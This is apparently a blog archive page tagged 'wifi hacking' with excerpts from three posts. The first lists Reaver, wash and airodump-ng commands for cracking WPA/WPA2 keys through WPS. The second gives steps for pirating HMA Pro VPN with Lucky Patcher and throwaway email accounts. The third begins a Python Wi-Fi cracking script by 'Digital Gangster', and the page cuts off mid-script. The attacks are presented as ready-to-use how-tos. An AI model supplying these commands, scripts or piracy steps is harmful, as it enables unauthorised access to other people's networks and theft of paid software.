Skip to main content

Posts

Showing posts with the label wifi hacking

Cracking WPA & WPA2 key with Reaver on Kali Linux (No Dictionary - Wordlist)

Cracking WPA & WPA2 key with Reaver on Kali Linux (No Dictionary - Wordlist) Open terminal: airmon-ng airmon-ng stop [your interface] [My is wlan0] airodump-ng [your interface] [My is wlan0] Open new terminal: wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s Open new terminal: reaver -i [your interface] [My is wlan0] -b [BSSID] —fail-wait=360 Breaking WPA2-PSK with Kali Linux : wireless. WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase. Below you will find a few easy steps on how to break WPA2 with a weak passphrase. Breaking the wireless Lab Home Network: I set up a test network for this blog article. The client box is logging into my wireless Lab test network. This is the network we will break. Selecting Wireless Network 300x274 Breaking WPA2 PSK with Kali Linux : wireless. Step 1: The first step is to verify the router configuration. Normal

Method For HMA(Free by Hacked)

Anon Av: PROGRAMMERdone THOD HMA Method hma pro 12 month 1- Download Lucky patcher from here : . http://lucky-patcher.ar.uptodown.com/android 2- Download Hma pro in android from Google play 2- Open Lucky patcher 3- click on the hma pro app then click Open menu of patches then create a modified apk file 4- click on the third option(apk rebuild for InApp &LVL) then click rebuild app 5-it will show please wait as it is building. Wait till it finishes. Don't touch phone screen or it will go 6- after it finishes ull see some success n error (don't worry it's all part) click go to file and click the apk select uninstall and install app 8- just wait when it finished install and go open the hma pro app 9- go sign up but first use temp mail (like mail.com getnada.com etc and get one account 10- sign up with it and close the app and open it again .. 11- when u open ull see two forms of payment, click Google play store (prices should be in decimals) click on 12 m

Wifi Cracking Script(Latest Working)

WPS cracking # Semi-automatic and simple (but working!) WEP/WPA/WPA2 Hacking script # External tools involved: Aircrack-ng pack, John the Ripper, Hashcat Ocl, Pyrit, Crunch, xterm. # Author: Digital Gangster # Before use it you may have to execute: "pip install termcolor" #!/usr/bin/python # -*- coding: utf-8 -*- import os, sys, time from termcolor import colored def killctrl(): os.system("airmon-ng check kill") wlist = "" print "\n+===========================================================================+" print "| DWH - Simple (but working) WEP/WPA/WPA2 Hacking script |" print "| Author: Digital Gangster, https://twitter.com/digitalgangster |" print "| Usage: Just run it and let it head you :) |" print "+===========================================================================+\n" time.sleep(1.5) print "[*] Removing useless files..." os.system("rm -rf capture* || true") print &qu